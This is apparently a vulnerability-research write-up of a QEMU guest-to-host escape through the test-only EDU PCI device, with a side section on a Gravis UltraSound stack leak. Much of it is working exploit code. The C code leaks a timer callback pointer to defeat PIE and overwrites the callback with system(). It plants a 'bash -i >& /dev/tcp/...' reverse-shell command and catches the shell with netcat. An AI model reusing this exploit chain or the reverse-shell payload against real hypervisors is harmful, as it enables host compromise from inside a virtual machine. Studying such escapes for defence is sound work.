2026-05-22 - research
Escaping QEMU
A reproducible guest-to-host escape against QEMU's educational PCI device. The bug is a DMA bounds check that logs out-of-range transfers but keeps going, giving both an out-of-bounds read and write against the timer callback stored next to the device's DMA buffer.
Why Qemu as a target for vulnerability research?
QEMU is the engine sitting underneath an enormous chunk of the world's virtualization. Most major clouds (GCP, Azure, DigitalOcean, OCI, and historically AWS before Nitro) run guest VMs on KVM-derived virtualization, and the userspace device model bolted to KVM is, in almost every case, QEMU - or something that mirrors its device-emulation contract closely enough that the guest can't tell the difference (Firecracker, Cloud Hypervisor, and crosvm are independent Rust codebases but they all implement the same virtio/virtio-net/virtio-block device interface guests see). If you are renting a Linux VM, there is a very good chance a QEMU process on the host is the thing emulating your "hardware".
The second reason is surface area. QEMU is roughly two million lines of C, most of it in hw emulating decades of real and obscure hardware - PCI devices, audio cards, SCSI controllers, NVMe, USB, network cards, GPUs, even a Gravis UltraSound from 1992. Most of that code parses attacker-controlled register writes, DMA descriptors, and packet formats with the same trust level as a kernel driver.
Third, the bug history is rich and well-precedented. VENOM (CVE-2015-3456) in the floppy controller, the long string of virtio-net / e1000 / xhci CVEs, repeated NVMe and USB issues, and more, QEMU has a long public history of guest-reachable memory corruption that turns into host code execution.
The source is open, the build is straightforward, the guest can be a tiny userspace process that talks directly to the device under audit, and the feedback loop between "write a few MMIO/PIO/DMA operations" and "watch the host process crash" is incredibly tight. For research aimed at a public writeup and a video PoC, that combination, and real-world impact is always hard to beat.
Methodology for bug hunting
Normally in small to medium sources it's fairly normal to do a static audit of the entire source, we did not do a full sweep for Qemu in other words we did not look at every single line of code, Qemu is BIG, two million plus lines of code big (and that's just the C code), so when analyzing source we opted for examining a few different sub sections in a few different directories, primarily we focused on: hw which serves as the emulated-device tree, where guest-reachable attack surface lives.
That audit produced a pile of candidate bugs across a couple of dozen devices - ATI, NVMe, USB MTP, GUS, EDU, others - most of which collapsed under scrutiny (DoS-only, unreachable from a default config, killed by a qemu_ram_mmap guard page, etc.). The one we landed on for the writeup is a clean classical OOB in hw/misc/edu.c. It's interesting for an unusual reason: the same primitive that gives you an OOB write also gives you an OOB read, so you don't need a second bug for a leak. Single bug, full chain.
A quick aside on the target file
Before we go any further, it's worth explaining about what hw/misc/edu.c is. EDU is QEMU's educational PCI device - a deliberately small, deliberately simple PCI device documented in docs/specs/edu.rst as an example for people learning the QEMU device model. You compile it in via CONFIG_TEST_DEVICES and attach it with -device edu. It is not part of any default production QEMU build. Debian's qemu-system-x86_64, Ubuntu's, RHEL's, the QEMU shipped by every cloud provider I checked - all built with the test devices stripped out.
So this writeup is not about a CVE, not a 0day, and upstream QEMU is not going to patch it (and shouldn't - the file is a tutorial). What it is is a self-contained, reproducible, single-bug guest-to-host escape, demonstrated end-to-end, against the exact device QEMU hands new contributors to teach them how device emulation is supposed to work.
There's also a second bug we played with along the way - an off-by-2x in the emulated Gravis UltraSound's 16-bit DMA path that leaks 2 KiB of host stack. That one is in a real device (well, real-ish - it's a 1992 ISA sound card), and the write-up below has a section on it. It didn't end up in the final chain because we realized EDU's bug was bidirectional; but the audit-and-walk-away process is part of the story.
The bug
The vulnerability is in edu_dma_timer(), and the one-line description is:
edu_check_range()logs the failure but doesn't abort the transfer; both the FROM_PCI and TO_PCI branches call it and both ignore the (non-existent) error signal, so a single OOB primitive points in both directions.
That's the whole thing. The leak path reads 16 bytes from before dma_buf and gives us QEMUTimer.cb (a .text pointer, defeats PIE) and QEMUTimer.opaque (the heap address of the EduState itself). The write path puts arbitrary bytes at that same location. Trigger the timer, QEMU's main loop calls cb(opaque), control's ours.
A brief primer on what we're talking to
If you've only done CTF pwn, "guest userspace exploits a PCI device emulated by the hypervisor" is a couple of layers more indirection than you're used to, so it's worth sketching the moving parts in one place before we get into the bug.
MMIO. A PCI device exposes some number of "BARs" (Base Address Registers). The PCI bus assigns each BAR a physical address range on the host bus; for our purposes, on the guest, that range gets mapped into guest physical memory. Stores to addresses inside that range don't go to RAM, they get routed to the device and the device's MMIO handler runs. From software, "write a byte to the device" is just *(volatile uint32_t*)addr = value;. The kernel side of this on Linux is exposed through sysfs: /sys/bus/pci/devices/<BDF>/resource0 is a file whose mmap is the device's BAR0. Open it, mmap it, and now *ptr writes to the device.
DMA. DMA stands for Direct Memory Access. The relevant property for us is that DMA is initiated by the device, not by the CPU. The CPU programs a few of the device's registers (source physical address, destination physical address, byte count, "go" bit), and then the device, completely independently of the CPU, reaches into system memory and reads or writes the range. The CPU has moved on by then. On real hardware this is how disks talk to RAM without making the CPU babysit each byte; on QEMU, the emulated device does the same thing through pci_dma_read / pci_dma_write helpers that copy in or out of the guest's memory image.
The crucial implication for exploitation is that DMA addresses are guest physical, not guest virtual. Our exploit lives in userspace and gets handed virtual addresses; we have to translate them to physical before we can hand them to the device.
Bus mastering. A PCI device only gets to initiate DMA if the "bus master" bit in its config space is set (PCI COMMAND register, offset 0x04, bit 2). Kernel drivers flip this in their probe() via pci_set_master(). A userspace process that just mmaps resource0 doesn't trigger that path, so bus master stays off, and every DMA the device tries to do gets silently nuked at the PCI bridge. This bit us hard; we'll come back to it.
Pagemap. To get virt->phys from userspace, Linux exposes /proc/self/pagemap. Each 4 KiB page of your virtual address space has an 8-byte entry: bit 63 is "page is present", bits 0–54 are the page frame number (PFN, i.e. which physical page it's mapped to). Read the entry for the page your buffer lives on, multiply the PFN by the page size, add the in-page offset, and you have the guest-physical address.
PIE / ASLR. Modern binaries (QEMU included) are compiled as Position-Independent Executables, and the loader picks a random base address at process start. To compute the address of anything in the binary - a function, a PLT entry, a .rodata string - we need to leak something whose load offset within the binary is known, then subtract.
That's basically the set of OS-internals we have to thread together. Now back to the bug.
The struct layout
Click here to see the EduState definition:
#define DMA_START 0x40000
#define DMA_SIZE 4096
struct EduState {
PCIDevice pdev;
MemoryRegion mmio;
...
struct dma_state {
dma_addr_t src;
dma_addr_t dst;
dma_addr_t cnt;
dma_addr_t cmd;
} dma;
QEMUTimer dma_timer; // <-- contains callback + opaque function pointers
char dma_buf[DMA_SIZE]; // <-- our OOB target buffer sits AFTER the timer
uint64_t dma_mask;
};
Two things matter. First, dma_buf is an in-struct field on the host heap (not its own allocation), so writes past it (or before it) corrupt sibling fields in the same EduState. Second, QEMUTimer dma_timer sits immediately before dma_buf, and a QEMUTimer contains a callback function pointer plus an opaque argument. Underflowing the dma_buf write lands exactly on top of those two fields.
Click here for QEMUTimer:
struct QEMUTimer {
int64_t expire_time; /* in nanoseconds */
QEMUTimerList *timer_list;
QEMUTimerCB *cb; // <-- function pointer fired on expiry
void *opaque; // <-- first argument passed to cb()
QEMUTimer *next;
int attributes;
int scale;
};
When the timer expires, QEMU's main loop literally does t->cb(t->opaque). Control both, and the next fire is "whatever function we want, with whatever argument we want".
The check that doesn't check
Click here to see the missing bounds check:
static void edu_check_range(uint64_t xfer_start, uint64_t xfer_size,
uint64_t dma_start, uint64_t dma_size)
{
uint64_t xfer_end = xfer_start + xfer_size;
uint64_t dma_end = dma_start + dma_size;
if (dma_end >= dma_start && xfer_end >= xfer_start &&
xfer_start >= dma_start && xfer_end <= dma_end) {
return;
}
qemu_log_mask(LOG_GUEST_ERROR,
"EDU: DMA range 0x%016"PRIx64"-0x%016"PRIx64
" out of bounds (0x%016"PRIx64"-0x%016"PRIx64")!",
xfer_start, xfer_end - 1, dma_start, dma_end - 1);
}
This is the entire validator. What's missing here is a return-with-error, an abort(), anything that stops the transfer. On a failed bounds check the function just qemu_log_mask() complains and falls off the end back into the caller, which keeps going as if nothing happened. The check is purely advisory.
Same bug, both directions
Click here for edu_dma_timer, the function this all happens inside:
static void edu_dma_timer(void *opaque)
{
EduState *edu = opaque;
...
if (EDU_DMA_DIR(edu->dma.cmd) == EDU_DMA_FROM_PCI) {
uint64_t dst = edu->dma.dst;
edu_check_range(dst, edu->dma.cnt, DMA_START, DMA_SIZE); // advisory only
dst -= DMA_START; // <-- underflow
pci_dma_read(&edu->pdev, edu_clamp_addr(edu, edu->dma.src),
edu->dma_buf + dst, edu->dma.cnt);
} else {
uint64_t src = edu->dma.src;
edu_check_range(src, edu->dma.cnt, DMA_START, DMA_SIZE); // advisory only
src -= DMA_START; // <-- underflow
pci_dma_write(&edu->pdev, edu_clamp_addr(edu, edu->dma.dst),
edu->dma_buf + src, edu->dma.cnt);
}
Same advisory check, same subtract-and-don't-handle-underflow, just pci_dma_read on the FROM_PCI branch (write into dma_buf) and pci_dma_write on the TO_PCI branch (read out of dma_buf). The flow is:
- Guest picks
dst = 0x3FFE0(=DMA_START - 0x20). Any value< 0x40000is enough. edu_check_range()logs an error, returns.dst -= DMA_STARTunderflows:0x3FFE0 - 0x40000asuint64_tis0xFFFFFFFFFFFFFFE0.dma_buf + dstin pointer arithmetic wraps mod2^64and lands0x20bytes beforedma_buf, which is exactly ondma_timer.cb/dma_timer.opaque.pci_dma_readwrites 16 attacker-controlled bytes there;pci_dma_writereads 16 bytes out of there back to the guest.
So one bug, applied two ways, gives us:
- OOB read (TO_PCI,
src = DMA_START - 0x20): leakscb(a known.textsymbol -> PIE base) andopaque(the heap address of theEduStatestruct itself). - OOB write (FROM_PCI,
dst = DMA_START - 0x20): overwritescbandopaquewith arbitrary 8-byte values.
Then we just need to fire the timer.
Click here for dma_rw, the helper that handles every register write:
static void dma_rw(EduState *edu, bool write, dma_addr_t *val, dma_addr_t *dma,
bool timer)
{
if (write && (edu->dma.cmd & EDU_DMA_RUN)) {
return;
}
if (write) {
*dma = *val;
} else {
*val = *dma;
}
if (timer) {
timer_mod(&edu->dma_timer, qemu_clock_get_ms(QEMU_CLOCK_VIRTUAL) + 100);
}
}
Any DMA kick goes through timer_mod(&edu->dma_timer, ...). After the OOB write has overwritten dma_timer.cb, the very next DMA run schedules a timer whose callback is system() and whose argument we control. ~100 ms later the QEMU main loop fires the timer: on the host cb(opaque) -> in the QEMU process system("bash -c '...'"). That's the whole chain.
The picture
GUEST HOST (QEMU process)
----- --------------------
STEP 1 - LEAK (TO_PCI, src = DMA_START - 0x20)
write SRC = 0x3FFE0 ┌──────────────────────────────────────┐
write DST = guest_phys │ edu_dma_timer() / TO_PCI branch │
write CNT = 16 │ edu_check_range() ── logs, returns │
write CMD = RUN | TO_PCI ─────────▶│ src -= DMA_START ── underflow │
│ pci_dma_write(... dma_buf+src,...) │
│ == pci_dma_write(... cb, 16) │
└──────────────┬───────────────────────┘
│ 16 bytes from before
▼ dma_buf into guest RAM
┌──────────────────────────────────────┐
│ QEMUTimer.cb (& edu_dma_timer) │
│ QEMUTimer.opaque (& EduState) │
└──────────────────────────────────────┘
read leak[0] = cb -> PIE base
read leak[1] = opaque -> heap base of EduState
STEP 2 - OVERWRITE (FROM_PCI, dst = DMA_START - 0x20)
write payload to guest buf:
[0] = pie_base + SYSTEM_PLT_OFF (system@plt)
[1] = opaque + DMABUF_OFF (&dma_buf in host heap)
... and plant "bash -c '...'" into dma_buf via an in-bounds FROM_PCI ...
write SRC = payload_phys ┌──────────────────────────────────────┐
write DST = 0x3FFE0 │ edu_dma_timer() / FROM_PCI branch │
write CNT = 16 │ edu_check_range() ── logs, returns │
write CMD = RUN | FROM_PCI ───────▶│ dst -= DMA_START ── underflow │
│ pci_dma_read(... dma_buf+dst,...) │
│ == pci_dma_read(... cb, 16) │
└──────────────┬───────────────────────┘
│ cb,opaque now ours
▼
STEP 3 - TRIGGER
write CMD = RUN | FROM_PCI ───────▶ dma_rw(timer=true)
timer_mod(&dma_timer, now+100ms)
│
▼ 100ms later
dma_timer.cb(opaque)
== system("bash -c '...'")
│
▼
reverse shell on the host
Three EDU MMIO sequences. That's it.
Exploit development
The two halves of the primitive are easy to describe and unforgiving to wire up. This section walks through the dev loop from "boot an Ubuntu guest" to "host QEMU process opens a reverse shell to our listener", including the time-burners we hit.
The dev loop
The exploit runs from guest userspace, not from a bare-metal kernel. We boot a stock Ubuntu 24.04 cloud image inside QEMU with the vulnerable -device edu attached, cloud-init drops in an SSH key, and a Makefile shuttles poc.c over SSH, compiles it on the guest, and we run it as root:
make run # boot Ubuntu, EDU attached, SSH forwarded to host:2222
make exploit # scp poc.c, gcc on the guest, leave ~/pwn ready
make run-exploit # sudo ./pwn over SSH, streamed to your terminal
make gdb # in another terminal: attach gdb to the QEMU host process,
# auto-break on edu_dma_timer and edu_mmio_write
Two terminals, one tight loop. Every iteration is "edit poc.c on the host, make run-exploit, watch edu_dma_timer fire in host gdb". When the chain works, gdb stops with the chosen sentinel in RIP (during the smoke-test) or with RIP = system@plt and RDI pointing at our planted "bash -c '...'" command string (for the real payload).
Talking to the device
The PoC is a regular Linux userspace program - no kernel module, no UIO driver. As mentioned above, Linux exposes every PCI device's BAR through sysfs, and you mmap that to get a pointer at the device's MMIO window:
static volatile void *map_bar0(const char *bdf, size_t size)
{
char path[512];
snprintf(path, sizeof path, "/sys/bus/pci/devices/%s/resource0", bdf);
int fd = open(path, O_RDWR | O_SYNC);
if (fd < 0) die_e("open resource0 (needs root)");
void *bar = mmap(NULL, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
if (bar == MAP_FAILED) die_e("mmap BAR0");
close(fd);
return bar;
}
Now mmio_w32(bar, EDU_REG_DMA_SRC, ...) is a direct store to device-mapped memory, and EDU's edu_mmio_write handler runs on the host as a side effect. We sanity-check with the factorial register (5! == 120) and a 64-byte DMA round-trip (guest RAM -> dma_buf -> guest RAM) before touching the bug:
static void sanity_dma_roundtrip(volatile void *bar)
{
struct dma_buf src = dma_alloc_low();
struct dma_buf dst = dma_alloc_low();
const char *msg = "edu dma roundtrip works";
strcpy(src.virt, msg);
edu_dma_run(bar, src.phys, EDU_DMA_START, 64, EDU_DMA_FROM_PCI);
edu_dma_run(bar, dst.phys, EDU_DMA_START, 64, EDU_DMA_TO_PCI);
if (memcmp(src.virt, dst.virt, strlen(msg)) != 0)
die("DMA roundtrip mismatch — virt->phys probably wrong");
printf("[+] DMA roundtrip: \"%s\"\n", (char *)dst.virt);
}
If this prints the round-tripped string, your virt->phys conversion is right, your bus-master bit is on, and your dma_mask clamp didn't silently rewrite the address. If it doesn't, none of the later stages will work either, and you want to figure out which of those three things is broken now, not three primitives deep.
The bus-master gotcha — must be enabled in the guest
The first real time-burner. With the round-trip in place, the FROM_PCI half of the DMA appeared to fire - edu_dma_timer ran, the RUN bit cleared, no error printed - but the destination buffer was still all zeros. Stepping host edu_dma_timer in gdb showed pci_dma_read(&edu->pdev, src.phys, dma_buf, 64) returning without populating dma_buf. The device received the right address, called into the PCI DMA helper, and got nothing back.
The reason: a PCI device can only initiate DMA when bus mastering is enabled in its PCI command register. Linux kernel drivers turn this on with pci_set_master() during probe(). A user-space process talking to the device via mmap of resource0 does not trigger that path - you get MMIO, but bus master stays off, and every DMA the device tries to issue is silently dropped.
The fix is one config-space write in the guest, done once at startup:
static void pci_enable_bus_master(const char *bdf)
{
char path[512];
snprintf(path, sizeof path, "/sys/bus/pci/devices/%s/config", bdf);
int fd = open(path, O_RDWR);
if (fd < 0) die_e("open config");
uint16_t cmd = 0;
if (pread(fd, &cmd, sizeof cmd, 0x04) != sizeof cmd) die_e("pread COMMAND");
if (!(cmd & 0x4)) {
cmd |= 0x4;
if (pwrite(fd, &cmd, sizeof cmd, 0x04) != sizeof cmd) die_e("pwrite COMMAND");
}
close(fd);
}
After this, pci_dma_read actually returns guest memory and the round-trip passes. Worth calling out because the failure mode is silent. The MMIO writes succeed, the device's dma.src / dst / cnt registers retain the values we put there, the timer fires on the host, and the read just produces zeros. No errno, no dmesg, no QEMU log line - only a dma_buf that never fills. We spent an embarrassing amount of time chasing the wrong leads (virt->phys correctness, page-migration / zero-page CoW, the EDU 28-bit dma_mask) before host gdb made it obvious. If you're targeting an emulated PCI device from guest userspace, enable bus master first, then trust your primitives.
virt -> phys, and the 28-bit DMA mask
DMA addresses go in guest physical form, but our mmap'd buffer is a guest virtual address. The standard trick - /proc/self/pagemap - works fine from a root process:
static uint64_t virt_to_phys(const void *vaddr)
{
static int pm_fd = -1;
if (pm_fd < 0) {
pm_fd = open("/proc/self/pagemap", O_RDONLY);
if (pm_fd < 0) die_e("open /proc/self/pagemap (needs root)");
}
uint64_t v = (uint64_t)vaddr;
uint64_t ps = sysconf(_SC_PAGESIZE);
uint64_t entry;
if (pread(pm_fd, &entry, sizeof entry, (v / ps) * sizeof entry) != sizeof entry)
die_e("pread pagemap");
if (!(entry & (1ULL << 63))) die("page %p not present", vaddr);
uint64_t pfn = entry & ((1ULL << 55) - 1);
if (pfn == 0) die("PFN zero for %p (need CAP_SYS_ADMIN)", vaddr);
return pfn * ps + (v % ps);
}
The page has to be present (touched) and ideally mlock'd before this read, otherwise the kernel may not have backed it yet, or may decide to swap or migrate it after you grab the PFN and leave you holding a stale physical address.
There's also one device-specific subtlety. The EDU device hard-codes its DMA address mask to 28 bits ((1UL << 28) - 1) at instance init, and pci_dma_read calls edu_clamp_addr(edu, src) = src & dma_mask before issuing the transfer. So any buffer whose physical address sits above 256 MiB silently gets aliased to a different page. With a 2 GiB guest, only ~1 in 8 freshly-allocated pages land in the low 256 MiB. We solved this with a brute-force "allocate, check, keep" loop:
static struct dma_buf dma_alloc_low(void)
{
for (int i = 0; i < LOW_PHYS_TRIES; i++) {
struct dma_buf b = dma_alloc(sysconf(_SC_PAGESIZE));
if (b.phys < EDU_LOW_PHYS_LIMIT) return b;
/* keep mlock'd to prevent PFN reuse; do not munmap */
}
die("no page below 256 MiB after %d tries", LOW_PHYS_TRIES);
struct dma_buf z = {0}; return z;
}
Mlocking the rejects (rather than munmap'ing them) is load-bearing. If you free them, the kernel happily recycles the same high PFNs back to you and the loop never terminates.
Pulling the leak
With the round-trip working and buffers in the low 256 MiB, the read-side OOB is one DMA away. TO_PCI direction, src = DMA_START - 0x20, count 16, host writes 16 bytes from dma_buf - 0x20 (= &dma_timer.cb) into our guest page:
struct dma_buf leak = dma_alloc_low();
memset(leak.virt, 0xa5, leak.size);
edu_dma_run(bar, leak.phys, EDU_DMA_START - 0x20, 0x10, EDU_DMA_TO_PCI);
uint64_t cb_leak = ((uint64_t *)leak.virt)[0];
uint64_t opaque_leak = ((uint64_t *)leak.virt)[1];
if (cb_leak == 0 || (cb_leak >> 47) != 0)
die("leak failed: cb=0x%lx opaque=0x%lx — bug not triggered?",
cb_leak, opaque_leak);
uint64_t pie_base = cb_leak - EDU_DMA_TIMER_OFF;
uint64_t system_addr = pie_base + SYSTEM_PLT_OFF;
uint64_t cmd_host_addr = opaque_leak + EDUSTATE_DMABUF_OFF;
cb_leak is &edu_dma_timer, the QEMU .text symbol the timer fires by default. Subtract its static offset within the binary and you have the PIE base; add the static offset of system@plt and you have the resolved address of system() in the QEMU process. opaque_leak is the EduState* itself (the timer's opaque is the EduState so the callback can find its own state), so opaque_leak + offsetof(EduState, dma_buf) is the host VA of dma_buf[0].
The build-specific numbers (EDU_DMA_TIMER_OFF, SYSTEM_PLT_OFF, EDUSTATE_DMABUF_OFF) come from nm, objdump, and a one-liner gdb on the QEMU binary - they're a few #defines at the top of poc.c.
Planting system's argument
Now we have to point system() at something useful. opaque becomes RDI when the timer fires, which is system()'s first argument - a const char * to the shell command we want to run. We can't write that string just anywhere; we need an address inside the QEMU host process that we control.
Two options were on the table. We could scan QEMU's .rodata for a useful command string - but the only thing remotely interesting is "/bin/sh" as a substring of #!/bin/sh lines, and system("/bin/sh") is useless to us because the spawned shell ends up fighting QEMU's monitor over stdio (we found this out the hard way during the smoke-test). Or, we could write our own string somewhere we know the host address of - and we already know the host address of dma_buf, because we just leaked the EduState* and offsetof(EduState, dma_buf) is a constant we get from gdb.
So before the OOB write, we plant the command string into dma_buf using a legit, in-bounds FROM_PCI DMA. This is just a normal write at dst = DMA_START, no underflow, no log spam:
#define RSHELL_CMD \
"bash -c 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'"
struct dma_buf cmd = dma_alloc_low();
memset(cmd.virt, 0, cmd.size);
strcpy(cmd.virt, RSHELL_CMD);
edu_dma_run(bar, cmd.phys, EDU_DMA_START, strlen(RSHELL_CMD) + 1, EDU_DMA_FROM_PCI);
offsetof(EduState, dma_buf) = 0xcc0 on the build I tested against; gdb prints it cleanly:
$ gdb -batch -ex 'p &((struct EduState *)0)->dma_buf' qemu-system-x86_64
$1 = (char (*)[4096]) 0xcc0
After this DMA returns, the string lives at host VA opaque_leak + 0xcc0.
From leak to RIP control
Now the actual exploit. OOB write with dst = DMA_START - 0x20, count 16, source a guest page containing { system@plt, &dma_buf }:
struct dma_buf payload = dma_alloc_low();
uint64_t *p = (uint64_t *)payload.virt;
p[0] = system_addr; /* -> dma_timer.cb */
p[1] = cmd_host_addr; /* -> dma_timer.opaque (= RDI = our cmd string) */
edu_dma_run(bar, payload.phys, EDU_DMA_START - 0x20, 16, EDU_DMA_FROM_PCI);
pci_dma_read runs on the host, the underflow lands the 16 bytes on dma_timer.cb / dma_timer.opaque, and the timer is now armed to call system(our_string) on its next fire.
Re-arming the timer
There's one more subtlety. The OOB write happens inside the callback the timer fired to do the OOB write in the first place. By the time pci_dma_read returns inside edu_dma_timer, the in-memory dma_timer.cb has been replaced with our value, but dma_timer itself has already been popped off the active-timers list - it won't fire again on its own. We need any subsequent CMD-write to call timer_mod() again, which re-inserts the now-corrupted timer:
if (timer) {
timer_mod(&edu->dma_timer, qemu_clock_get_ms(QEMU_CLOCK_VIRTUAL) + 100);
}
So the exploit issues a small kick after the overwrite, just a CMD write with RUN=1 and a direction bit. We use a "fire and forget" wrapper that doesn't poll for RUN-clear - because the moment the corrupted callback runs, control transfers to system(), which is not going to be clearing RUN for us:
static void edu_dma_trigger_nowait(volatile void *bar, uint32_t direction)
{
mmio_w64(bar, EDU_REG_DMA_CMD, EDU_DMA_RUN | direction);
}
100 ms later, on the host, QEMU's main loop fires system("bash -c 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'"). A netcat -lvnp 4444 waiting in another terminal gets an interactive bash session running as the user QEMU was running as. From there it's a regular host - you can read /proc/self/exe, look at the parent process tree, do whatever a process with the QEMU UID is allowed to do, and the VM you started in is still happily running below you.
From inside an unprivileged Ubuntu guest, no kernel module, just MMIO and PCI DMA against -device edu, the QEMU process is now running bash for us. Everything above this in the host's process tree - libvirt, the cloud control plane, whatever else trusted QEMU to stay in its lane - now answers to us.
The path not taken — GUS
Our first leak primitive lived in a totally different device. The 16-bit DMA path in QEMU's emulated Gravis UltraSound has a real-honest-to-god off-by-2× bug that reads twice as many bytes from a 4 KiB host stack buffer as it actually contains, and dumps those bytes into guest-readable wavetable RAM.
static int GUS_read_DMA(void *opaque, int nchan, int dma_pos, int dma_len)
{
QEMU_UNINITIALIZED char tmpbuf[4096]; // stack buffer, NOT zeroed
...
copied = k->read_memory(s->isa_dma, nchan, tmpbuf, pos, to_copy);
gus_dma_transferdata(&s->emu, tmpbuf, copied, left == copied);
...
}
tmpbuf is 4 KiB on the host stack, deliberately uninitialized. ISA DMA fills copied bytes from guest RAM. Then gus_dma_transferdata() does this:
for (; count > 0; count--)
{
if (GUSregb(GUS41DMACtrl) & 0x40)
*(destaddr++) = *(srcaddr++); // lobyte
else
*(destaddr++) = (msbmask ^ (*(srcaddr++))); // 8-bit
if (state->gusdma >= 4) // <-- 16-bit DMA channel
*(destaddr++) = (msbmask ^ (*(srcaddr++))); // hibyte
}
count decrements by 1 per iteration, but when state->gusdma >= 4 (a 16-bit DMA channel, guest-selectable) the loop consumes two bytes of srcaddr per iteration. So it reads 2 * count bytes from a buffer that only has count valid bytes, the next 4 KiB past tmpbuf on the host stack gets sucked in and written into wavetable RAM. The guest reads it back one byte at a time through port 0x307 (DRAMaccess).
The leak is deterministic. GUS_read_DMA() is invoked as the i8257 DMA callback, so on entry the stack frame immediately above tmpbuf always contains the saved return address into i8257_dma_run+175 plus surrounding register spills. That gives a stable QEMU .text pointer on every run, which is enough to defeat PIE the same way the EDU read does.
This worked. We had a working PoC for it in a bare-metal guest. What killed it for the final writeup chain was the plumbing. The 16-bit ISA DMA bus is 24-bit-addressable, so we needed a guest-physical buffer below 16 MiB. Linux refuses to hand userspace ZONE_DMA (< 16 MiB) pages because those are reserved for kernel DMA. The workaround is memmap=4K$0xADDR on the kernel cmdline, which marks a 4 KiB region as "reserved" in the e820 map, then mmap('/dev/mem', ..., ADDR) to grab it. It works, but it requires a guest reboot, it requires picking an address that isn't already in use by the kernel (and bricking the guest a few times until you find one that is), and it adds ~150 lines of i8257 and GUS programming. None of that pays off compared to "just use the EDU TO_PCI direction".
The realization is also kind of funny in retrospect. Looking at edu_dma_timer() one more time, and noticing that the FROM_PCI and TO_PCI branches were structurally identical - same advisory check, same subtraction, same dma_buf + dst/src, just pci_dma_read vs pci_dma_write. We'd been planning to use one bug to leak a thing we could already leak with the bug we were planning to use for the write. So we threw GUS out and the exploit shrank by 60%.
Video PoC
Three-terminal demo - QEMU running with -device edu, the SSH session into the guest that fires the exploit, and a netcat listener that catches the reverse shell when the corrupted timer fires.
No CVE, references, credits
There's nothing to disclose. EDU is CONFIG_TEST_DEVICES-gated tutorial code, not in any production QEMU build. Upstream isn't going to patch it, and shouldn't. If you find the same anti-pattern in a real device (we have suspects from the audit, but several of them definitely live in production builds), that's a different conversation, and the disclosure path is qemu-security@nongnu.org.
Sources / references / further reading:
hw/misc/edu.c- the device file.include/qemu/timer.h- theQEMUTimerdefinition.hw/audio/gus.c+hw/audio/gusemu_hal.c- the path not taken.- VENOM (CVE-2015-3456) - the canonical example of this category, a guest-reachable heap overflow in the QEMU floppy controller that turned into host RCE.
- All public QEMU CVEs: opencve.io.
The PoC and a reproducer Docker environment live in this writeup tree at release/, and the same code mirrored to its own repo at github.com/xchglabs/Qemu-guest-to-host. Clone, follow the three-terminal workflow in the README (make run, nc -nvlp 4444, make exploit + make ssh + sudo ./pwn), watch the host fall over.
Thanks for reading.